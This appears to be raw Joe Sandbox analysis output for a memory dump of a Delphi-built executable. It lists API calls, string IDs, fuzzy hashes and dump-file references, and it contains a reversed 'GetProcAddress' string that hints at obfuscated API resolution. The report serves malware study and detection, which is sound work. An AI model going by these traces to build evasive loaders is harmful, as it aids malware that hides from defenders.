                                                                                                                              • Opcode Fuzzy Hash: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                                                                                                              • Instruction Fuzzy Hash: 44317E3213659B4EC7088B3CC8514ADAB93BE937353A843B7C071CB5D7D7B5A26E8290
                                                                                                                              APIs
                                                                                                                              • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 02B2D21D
                                                                                                                                • Part of subcall function 02B2D1E8: GetProcAddress.KERNEL32(00000000), ref: 02B2D201
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                                              • Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_2b20000_x.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AddressHandleModuleProc
                                                                                                                              • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                                                                                                                              • API String ID: 1646373207-1918263038
                                                                                                                              • Opcode ID: e1081c6884ab5b775a44db948e857c2ec21c8e78325d63cc3f794430c1ba0e3b
                                                                                                                              • Instruction ID: bde7d9d7a449cb8dee3ee202645d36836a840eebd6ee8025c2ac599a92860fb8
                                                                                                                              • Opcode Fuzzy Hash: e1081c6884ab5b775a44db948e857c2ec21c8e78325d63cc3f794430c1ba0e3b
                                                                                                                              • Instruction Fuzzy Hash: B7416D62A9533A4B12086F6D780042B7F9ED7883913A144DFF05CCBB44DD20B99F8E6A
                                                                                                                              APIs
                                                                                                                              • GetModuleHandleA.KERNEL32(ole32.dll), ref: 02B36E5E
                                                                                                                              • GetProcAddress.KERNEL32(00000000,CoCreateInstanceEx), ref: 02B36E6F
                                                                                                                              • GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 02B36E7F
                                                                                                                              • GetProcAddress.KERNEL32(00000000,CoAddRefServerProcess), ref: 02B36E8F
                                                                                                                              • GetProcAddress.KERNEL32(00000000,CoReleaseServerProcess), ref: 02B36E9F
                                                                                                                              • GetProcAddress.KERNEL32(00000000,CoResumeClassObjects), ref: 02B36EAF
                                                                                                                              • GetProcAddress.KERNEL32(00000002), ref: 02B36EBF
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                                              • Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_2b20000_x.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AddressProc$HandleModule
                                                                                                                              • String ID: CoAddRefServerProcess$CoCreateInstanceEx$CoInitializeEx$CoReleaseServerProcess$CoResumeClassObjects$CoSuspendClassObjects$ole32.dll
                                                                                                                              • API String ID: 667068680-2233174745
                                                                                                                              • Opcode ID: 7c1ac579edc1bab7adcac2cf1e6fcf44590bbdadbe6e82608f0c32e2d7631765
                                                                                                                              • Instruction ID: 5bc7630051104b472d665a981389d4396ac15851a889144abf612cbc984658ac
                                                                                                                              • Opcode Fuzzy Hash: 7c1ac579edc1bab7adcac2cf1e6fcf44590bbdadbe6e82608f0c32e2d7631765
                                                                                                                              • Instruction Fuzzy Hash: ADF0ACB8A883727EB3137F709CC18673BDDE701A4470019E6B61696A12DAB5841C4F64
                                                                                                                              APIs
                                                                                                                              • MessageBoxA.USER32(00000000,?,Unexpected Memory Leak,00002010), ref: 02B228CE
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                                              • Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_2b20000_x.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Message
                                                                                                                              • String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown
                                                                                                                              • API String ID: 2030045667-32948583
                                                                                                                              • Opcode ID: 30f2382ea7ac69a246c6190321eefd1c97b25157a34f9ba4d3c5bfee8643d1eb
                                                                                                                              • Instruction ID: ef074bb8b2e0ef6134537f12044adc3609150cac9be9238bd9d79d37fc45beac
                                                                                                                              • Opcode Fuzzy Hash: 30f2382ea7ac69a246c6190321eefd1c97b25157a34f9ba4d3c5bfee8643d1eb
                                                                                                                              • Instruction Fuzzy Hash: 6AA1B131A043788BDB21AA2CCC84B99B6E5EB09350F1441E5ED4DEB386CB7599CECF51
                                                                                                                              Strings
                                                                                                                              • bytes: , xrefs: 02B2275D
                                                                                                                              • 7, xrefs: 02B226A1
                                                                                                                              • An unexpected memory leak has occurred. , xrefs: 02B22690
                                                                                                                              • Unexpected Memory Leak, xrefs: 02B228C0
                                                                                                                              • The sizes of unexpected leaked medium and large blocks are: , xrefs: 02B22849
                                                                                                                              • The unexpected small block leaks are:, xrefs: 02B22707
                                                                                                                              • , xrefs: 02B22814
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                                              • Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_2b20000_x.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak
                                                                                                                              • API String ID: 0-2723507874
                                                                                                                              • Opcode ID: f2983cb85add3d6b13230e4230c5e30f00bd3d797609e6ccf031857a607d5b37
                                                                                                                              • Instruction ID: 52f48dc29ee7f02ac22b639924af9f6a8f66314d1e7bdd7a70e2c2592ca10a98
                                                                                                                              • Opcode Fuzzy Hash: f2983cb85add3d6b13230e4230c5e30f00bd3d797609e6ccf031857a607d5b37
                                                                                                                              • Instruction Fuzzy Hash: 5D719230A043788FDB21AA2CCC84BD9BAE5EB09754F1041E5D94DEB281DB759AC9CF51
                                                                                                                              APIs
                                                                                                                              • GetThreadLocale.KERNEL32(00000000,02B2C00B,?,?,00000000,00000000), ref: 02B2BD76
                                                                                                                                • Part of subcall function 02B2A744: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02B2A762
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                                              • Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_2b20000_x.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Locale$InfoThread
                                                                                                                              • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                                                                                              • API String ID: 4232894706-2493093252
                                                                                                                              • Opcode ID: 63b6a37788cc9953f5343d8d0add01b9b7d3f43e7c8698fa8b4503afc28eed14
                                                                                                                              • Instruction ID: 6ebdd7fb2dacc12e4a4cf657a1ad8978dc86fd9d9784f31c344c3869f2a3611a
                                                                                                                              • Opcode Fuzzy Hash: 63b6a37788cc9953f5343d8d0add01b9b7d3f43e7c8698fa8b4503afc28eed14
                                                                                                                              • Instruction Fuzzy Hash: CF616E35B003689BDB00FBA4DC90BDF77BBDF48340F1198B5A1099B605CA38D94E9BA5
                                                                                                                              APIs
                                                                                                                              • IsBadReadPtr.KERNEL32(?,00000004), ref: 02B3AE38
                                                                                                                              • GetModuleHandleW.KERNEL32(KernelBase,LoadLibraryExA,?,00000004,?,00000014), ref: 02B3AE4F
                                                                                                                              • IsBadReadPtr.KERNEL32(?,00000004), ref: 02B3AEE3
                                                                                                                              • IsBadReadPtr.KERNEL32(?,00000002), ref: 02B3AEEF
                                                                                                                              • IsBadReadPtr.KERNEL32(?,00000014), ref: 02B3AF03
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                                              • Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_2b20000_x.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Read$HandleModule
                                                                                                                              • String ID: KernelBase$LoadLibraryExA
                                                                                                                              • API String ID: 2226866862-113032527
                                                                                                                              • Opcode ID: 6f5de11134bf9064cb31d8ce290aba7405be1d99a2657e10d1dbf065e73ec4a3
                                                                                                                              • Instruction ID: b85f60ed237f951c2e89ea557c60191714f1af377d90485f7c3a2b13f6eb55c9
                                                                                                                              • Opcode Fuzzy Hash: 6f5de11134bf9064cb31d8ce290aba7405be1d99a2657e10d1dbf065e73ec4a3
                                                                                                                              • Instruction Fuzzy Hash: 563122B1640315BBDB12DF68CC85F9A77A8EF04754F204590FA98DB281D774A950CBA1
                                                                                                                              APIs
                                                                                                                              • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02B243F3,?,?,02B807C8,?,?,02B4D7A8,02B2655D,02B4C30D), ref: 02B24365
                                                                                                                              • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02B243F3,?,?,02B807C8,?,?,02B4D7A8,02B2655D,02B4C30D), ref: 02B2436B
                                                                                                                              • GetStdHandle.KERNEL32(000000F5,02B243B4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02B243F3,?,?,02B807C8), ref: 02B24380
                                                                                                                              • WriteFile.KERNEL32(00000000,000000F5,02B243B4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02B243F3,?,?), ref: 02B24386
                                                                                                                              • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 02B243A4
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                                              • Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_2b20000_x.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: FileHandleWrite$Message
                                                                                                                              • String ID: Error$Runtime error at 00000000
                                                                                                                              • API String ID: 1570097196-2970929446
                                                                                                                              • Opcode ID: 0deee3a5155c4083fa1bbfa134a053316d06f40084b134b2908d8d2749303e7e
                                                                                                                              • Instruction ID: 307a2fde8b0f9d07f7b8676dad534f2884633019e781f05f1b82ac8d85953777
                                                                                                                              • Opcode Fuzzy Hash: 0deee3a5155c4083fa1bbfa134a053316d06f40084b134b2908d8d2749303e7e
                                                                                                                              • Instruction Fuzzy Hash: 7BF02B71AD033074F710A7646D46F59276C4B05F55F104AD4F23C994D18BB490CCDB26
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 02B2ACBC: VirtualQuery.KERNEL32(?,?,0000001C), ref: 02B2ACD9
                                                                                                                                • Part of subcall function 02B2ACBC: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02B2ACFD
                                                                                                                                • Part of subcall function 02B2ACBC: GetModuleFileNameA.KERNEL32(02B20000,?,00000105), ref: 02B2AD18
                                                                                                                                • Part of subcall function 02B2ACBC: LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02B2ADAE
                                                                                                                              • CharToOemA.USER32(?,?), ref: 02B2AE7B
                                                                                                                              • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 02B2AE98
                                                                                                                              • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02B2AE9E
                                                                                                                              • GetStdHandle.KERNEL32(000000F4,02B2AF08,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02B2AEB3
                                                                                                                              • WriteFile.KERNEL32(00000000,000000F4,02B2AF08,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02B2AEB9
                                                                                                                              • LoadStringA.USER32(00000000,0000FFEA,?,00000040), ref: 02B2AEDB
                                                                                                                              • MessageBoxA.USER32(00000000,?,?,00002010), ref: 02B2AEF1
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                                              • Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_2b20000_x.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 185507032-0
                                                                                                                              • Opcode ID: 491f808e2b7a675c36f1f545d5a9c6246c2cbdb305617e945d2fb2f1840e0b96
                                                                                                                              • Instruction ID: 11047321ceed2af91b8804a99d83c7b5814b2d479ac08b8385ac415a4eef22a1
                                                                                                                              • Opcode Fuzzy Hash: 491f808e2b7a675c36f1f545d5a9c6246c2cbdb305617e945d2fb2f1840e0b96
                                                                                                                              • Instruction Fuzzy Hash: 1A1130B25483507ED601FBA4DC81F9B77EDAB44740F40099AB758D71E0DA70E94C8F66
                                                                                                                              APIs
                                                                                                                              • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 02B2E5A5
                                                                                                                              • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 02B2E5C1
                                                                                                                              • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 02B2E5FA
                                                                                                                              • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 02B2E677
                                                                                                                              • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 02B2E690
                                                                                                                              • VariantCopy.OLEAUT32(?,00000000), ref: 02B2E6C5
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                                              • Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_2b20000_x.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 351091851-0
                                                                                                                              • Opcode ID: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                                                                                                              • Instruction ID: aa8a0f72767948a6574ddabd34ab5f3960e8fe41a1014243c0a974b32238fde2
                                                                                                                              • Opcode Fuzzy Hash: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                                                                                                              • Instruction Fuzzy Hash: 7F51C6759007299BCB22DB59CC80BD9B3BDAF4D304F0442D5E60DA7206DA30EF898F65
                                                                                                                              APIs
                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02B2358A
                                                                                                                              • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,02B235D9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02B235BD
                                                                                                                              • RegCloseKey.ADVAPI32(?,02B235E0,00000000,?,00000004,00000000,02B235D9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02B235D3
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                                              • Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_2b20000_x.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CloseOpenQueryValue
                                                                                                                              • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                                                                              • API String ID: 3677997916-4173385793
                                                                                                                              • Opcode ID: b5e316522baf2860815bfe892ef7778b04a6ec91f882216649677726fa1e674a
                                                                                                                              • Instruction ID: f060609930730e8b638e9741eb05c7260813a215267a686851b9cb279585f51c
                                                                                                                              • Opcode Fuzzy Hash: b5e316522baf2860815bfe892ef7778b04a6ec91f882216649677726fa1e674a
                                                                                                                              • Instruction Fuzzy Hash: 7201D879954328BAF711DB90CD42BBD77FCEB08710F1005E1BA0CD7680E678AA14DB59
                                                                                                                              APIs
                                                                                                                              • GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B38148,?,?,00000000,00000000,?,02B38061,00000000,KernelBASE,00000000,00000000,02B38088), ref: 02B3810D
                                                                                                                              • GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B38113
                                                                                                                              • GetProcAddress.KERNEL32(?,?), ref: 02B38125
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                                              • Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_2b20000_x.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AddressProc$HandleModule
                                                                                                                              • String ID: Kernel32$sserddAcorPteG
                                                                                                                              • API String ID: 667068680-1372893251
                                                                                                                              • Opcode ID: 6d1bec3b9f3e7e35ed84b7aa921e8b14818c4212109a58f2ec86b04f4cbf6aec
                                                                                                                              • Instruction ID: 8acf2a93a133c37591560a337c867ce83f8fc216adcddbc4a490d41ec46cd9eb
                                                                                                                              • Opcode Fuzzy Hash: 6d1bec3b9f3e7e35ed84b7aa921e8b14818c4212109a58f2ec86b04f4cbf6aec
                                                                                                                              • Instruction Fuzzy Hash: 5E014F75A50308BFEB02EFA4DC41A9E77BEEB4D710F5184A4F508A7A10DA70A915CA21
                                                                                                                              APIs
                                                                                                                              • GetThreadLocale.KERNEL32(?,00000000,02B2AA67,?,?,00000000), ref: 02B2A9E8
                                                                                                                                • Part of subcall function 02B2A744: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02B2A762
                                                                                                                              • GetThreadLocale.KERNEL32(00000000,00000004,00000000,02B2AA67,?,?,00000000), ref: 02B2AA18
                                                                                                                              • EnumCalendarInfoA.KERNEL32(Function_0000A91C,00000000,00000000,00000004), ref: 02B2AA23
                                                                                                                              • GetThreadLocale.KERNEL32(00000000,00000003,00000000,02B2AA67,?,?,00000000), ref: 02B2AA41
                                                                                                                              • EnumCalendarInfoA.KERNEL32(Function_0000A958,00000000,00000000,00000003), ref: 02B2AA4C
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                                              • Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_2b20000_x.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Locale$InfoThread$CalendarEnum
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4102113445-0
                                                                                                                              • Opcode ID: a202f69da43f37349ba956e40217c894746d713e8073df507476f02ab382b793
                                                                                                                              • Instruction ID: a5f4c26f98753ecec4e842a52e2aa809cce7e888cf180a585b60fe8a573c8895
                                                                                                                              • Opcode Fuzzy Hash: a202f69da43f37349ba956e40217c894746d713e8073df507476f02ab382b793
                                                                                                                              • Instruction Fuzzy Hash: 7201F7316403786BF702B6748D12FAE735DDF46B20F9101E0F62CA6A94D6249E0C8A68
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 02B23538: GetKeyboardType.USER32(00000000), ref: 02B2353D
                                                                                                                                • Part of subcall function 02B23538: GetKeyboardType.USER32(00000001), ref: 02B23549
                                                                                                                              • GetCommandLineA.KERNEL32 ref: 02B4C06C
                                                                                                                              • GetACP.KERNEL32 ref: 02B4C080
                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 02B4C08A
                                                                                                                                • Part of subcall function 02B23568: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02B2358A
                                                                                                                                • Part of subcall function 02B23568: RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,02B235D9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02B235BD
                                                                                                                                • Part of subcall function 02B23568: RegCloseKey.ADVAPI32(?,02B235E0,00000000,?,00000004,00000000,02B235D9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02B235D3
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                                              • Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_2b20000_x.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: KeyboardType$CloseCommandCurrentLineOpenQueryThreadValue
                                                                                                                              • String ID: x6d
                                                                                                                              • API String ID: 3316616684-1717621966
                                                                                                                              • Opcode ID: 30211bde1758b2fed10c1403161e81695cd3e2fdc00584dfb45b8a65b0cadce2
                                                                                                                              • Instruction ID: 91f0d0c4e3d5c144bcd8ed875747b4d74fa2539a981557b57b73cf4cf6e7f338
                                                                                                                              • Opcode Fuzzy Hash: 30211bde1758b2fed10c1403161e81695cd3e2fdc00584dfb45b8a65b0cadce2
                                                                                                                              • Instruction Fuzzy Hash: 381182B4C953A08ED312AF74619A2493F75AF13388B085CDDC5884F253E738811ECF66
